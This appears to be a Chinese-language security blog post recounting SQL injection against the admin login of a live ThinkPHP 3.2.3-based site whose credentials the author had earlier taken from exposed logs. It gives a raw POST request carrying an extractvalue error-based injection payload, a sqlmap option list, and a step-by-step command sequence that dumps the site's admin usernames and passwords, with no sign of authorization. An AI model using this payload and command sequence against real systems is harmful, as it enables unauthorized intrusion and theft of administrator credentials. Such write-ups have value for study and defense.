

S1xHcL's Blog.

sqlmap 基本用法

S1xHcL's Blog.

sqlmap 基本用法

learn sqlmap

Word count: 534Reading time: 2 min

 2021/02/01   Share

• 
• 
• 
• 
• 

补充

此文章为之前旧博客内容，不曾想该站还仍然存活，简单记录sqlmap的使用

目标情况

目标站为Thinkphp，存在日志文件

上次通过日志发现网站后台路径和管理员登录密码，成功登录后台

现在网站的管理员密码已经修改

挖掘漏洞

现在登录后台密码错误，但该网站属于Thinkphp v3.2.3二改版本，说不定存在开发人员疏忽的地方

后台页面没有验证码，目前有两种思路：

• 大字典暴力破解
• 测试是否存在万能密码或者sql注入

第一种思路直接放弃，可以但没必要

在账户输入框里直接加单引号'尝试，返回Thinkphp debug页面，应该是有注入了

POST /adminaa.php/Admin/Account/login HTTP/1.1
Host: www.abc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
DNT: 1
Connection: close
Cookie: PHPSESSID=48kl7m02l2m41hc0rnb6brsb02
Upgrade-Insecure-Requests: 1

username=1231') and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--('&password=123456

SQLMAP

SQLMAP一把梭

–current-db 判断当前数据库名称
–dbs 列出所有数据库
-D 指定数据库名
-T 指定表名
-C 指定字段
-r 指定文件
-os 指定操作系统(Windows,Linux)
–dbms 指定数据库类型(Mysql,Sql server,Oracle,PostgreSQL…)
–os-shell 调出交互式操作系统 shell
–sql-shell 调出交互式 SQL shell
–batch 按照默认执行
–random-agent 随机浏览器UA

python3 sqlmap.py -r 2.txt --batch --random-agent --dbms=mysql --is-dba
python3 sqlmap.py -r 2.txt --batch --random-agent --dbms=mysql --dbs
python3 sqlmap.py -r 2.txt --batch --random-agent --dbms=mysql -D www --tables
python3 sqlmap.py -r 2.txt --batch --random-agent --dbms=mysql -D www -T yh_admin --columns
python3 sqlmap.py -r 2.txt --batch --random-agent --dbms=mysql -D www -T yh_admin -C "username,password" --dump

得到管理员账号和密码

Author：S1xHcL

原文链接：https://s1xhcl.github.io/2021/02/01/sqlmap-%E8%AE%B0%E5%BD%95/

发表日期：February 1st 2021, 9:45:27 pm

更新日期：February 1st 2021, 11:36:49 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  常见CMS后台收集
• Previous Post
  InterView

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 补充
2. 2. 目标情况
3. 3. 挖掘漏洞
4. 4. SQLMAP



• Archive
• Tag
• Cate

Total : 46

2024

• 06/02ThinkPHP 命令执行代码审计学习

2023

• 03/16Nacos 身份认证绕过漏洞复现
• 02/07PHPYun代码审计

2022

• 12/29ThinkPHP 代码审计学习记录
• 12/29ThinkPHP 代码审计学习记录
• 12/16yakit之编写poc
• 10/18CNVD-2022-42853-漏洞分析
• 10/18PHP-Audit Day12 误用htmlentities函数引发的漏洞
• 10/11PHP-Audit Day11 unserialize反序列化漏洞
• 04/30Apache Struts漏洞分析学习-S2-062
• 04/10PHP-Audit Day10 程序未恰当exit导致的问题
• 04/03PHP-Audit-Day09-str-replace-函数过滤不当

2021

• 11/01查找 spring heapdump 中的密码明文
• 10/22Pentest-tips 收集
• 10/16PHP-Audit Day08 preg_replace函数之命令执行
• 10/14PHP-Audit Day07 parse_str函数缺陷
• 10/12PHP-Audit Day06 正则使用不当导致的路径穿越问题
• 10/10PHP-Audit Day05 escapeshellarg与escapeshellcmd使用不当
• 10/06PHP-Audit Day04 strpos使用不当引发漏洞
• 10/03PHP-Audit Day03 实例化任意对象漏洞
• 10/02PHP-Audit Day02 filter_var()函数缺陷
• 10/01PHP-Audit Day01 in_array()函数缺陷
• 09/20某平台渗透测试记录
• 08/30bluecms-代码审计学习
• 08/12sql注入-安全狗绕过
• 04/24Interview4
• 04/23Windows认证-Kerberos
• 04/082021-HW
• 04/06Windows认证机制学习
• 04/01一次简单的杀猪盘getshell
• 03/27Interview3.md
• 03/27CVE-2021-22986-POC
• 03/24国内某系统任意文件读取漏洞
• 03/17对某棋牌站的一次getshell
• 03/13通达OA v11.7 在线用户登录漏洞
• 03/08CNVD-2021-14536-POC
• 03/06php_bugs
• 03/02Interview2
• 02/22C_Notes
• 02/09CVE-2020-17518/17519复现
• 02/03对某BC站的一次不完整渗透
• 02/02常见CMS后台收集
• 02/01sqlmap 基本用法
• 01/31InterView

2019

• 09/09CVE-2019-0708 复现
• 09/08Hello World

HW CVE Tools learn Struts Python Windows code InterView Learn PHP Audit Pentest ThinkPHP RCE Sql Windows认证 Kerberos sqlmap sql POC Work OA



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

POC CVE Audit CVE/EXP CVE/POC C Audit/Java learn Audit/PHP Vul Tips 内网学习 tools bypass POC/YAKIT Pentest 0Day mark

